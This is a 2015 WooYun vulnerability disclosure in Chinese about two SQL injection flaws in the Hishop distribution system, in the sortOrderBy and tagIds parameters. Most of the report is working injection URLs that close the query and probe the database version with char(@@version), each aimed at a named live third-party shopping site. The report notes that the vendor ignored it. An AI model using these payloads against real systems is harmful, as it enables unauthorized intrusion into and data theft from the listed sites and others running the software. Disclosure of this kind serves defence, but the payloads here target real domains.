当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135720

漏洞标题:Hishop易分销系统SQL注入*2

相关厂商:Hishop

漏洞作者: 路人甲

提交时间:2015-08-21 14:48

修复时间:2015-10-05 14:50

公开时间:2015-10-05 14:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

关键在于闭合技术

详细说明:

看到 WooYun: hishop易分销系统sql注入一枚 就测试了一下发现了两处SQL
正如前面这位大牛说的,案例实在是多,用户量很大啊。
sql 1:
/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts sortOrderBy参数注入
这里要合适的闭合才能够注入,不同的站点可能不同的闭合方法,我就拿5个案例来说事了。

http://eyigo.com/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts Desc) AS RowNumber FROM vw_Hishop_BrowseProductList p WHERE SaleStatus = 1) T WHERE 1=1 and 1=char(@@version) --
http://spt.0351tao.cn/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts Desc) AS RowNumber FROM vw_Hishop_BrowseProductList p WHERE SaleStatus = 1) T WHERE 1=1 and 1=char(@@version) --
http://www.gzkorea.com/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts Desc) AS RowNumber FROM vw_Hishop_BrowseProductList p WHERE SaleStatus = 1) T WHERE 1=1 and 1=char(@@version) --
http://feihongzhixin.mall.hjhl.cn/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts Desc) AS RowNumber FROM vw_Hishop_BrowseProductList p WHERE SaleStatus = 1) T WHERE 1=1 and 1=char(@@version) --
http://www.xdhome.com/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts Desc) AS RowNumber FROM vw_Hishop_BrowseProductList p WHERE SaleStatus = 1) T WHERE 1=1 and 1=char(@@version) --


1.png


sql2:
/ProductUnSales.aspx?keywords=wooyun&tagIds=1_2&pageIndex=1 tagIds参数注入
继续拿几个案例说事:

http://qmhy.com.cn/ProductUnSales.aspx?keywords=wooyun%27&tagIds=1_2)) T WHERE 1=1 and 1=(select char(@@version)) -- &pageIndex=1
http://spt.0351tao.cn/ProductUnSales.aspx?keywords=wooyun%27&tagIds=1_2)) T WHERE 1=1 and 1=(select char(@@version)) -- &pageIndex=1
http://yuntoys.cn/ProductUnSales.aspx?keywords=wooyun%27&tagIds=1_2)) T WHERE 1=1 and 1=(select char(@@version)) -- &pageIndex=1
http://5upf.com/ProductUnSales.aspx?keywords=wooyun%27&tagIds=1_2)) T WHERE 1=1 and 1=(select char(@@version)) -- &pageIndex=1
http://www.miegs.com/ProductUnSales.aspx?keywords=wooyun%27&tagIds=1_2)) T WHERE 1=1 and 1=(select char(@@version)) -- &pageIndex=1


2.png

漏洞证明:

1.png


2.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝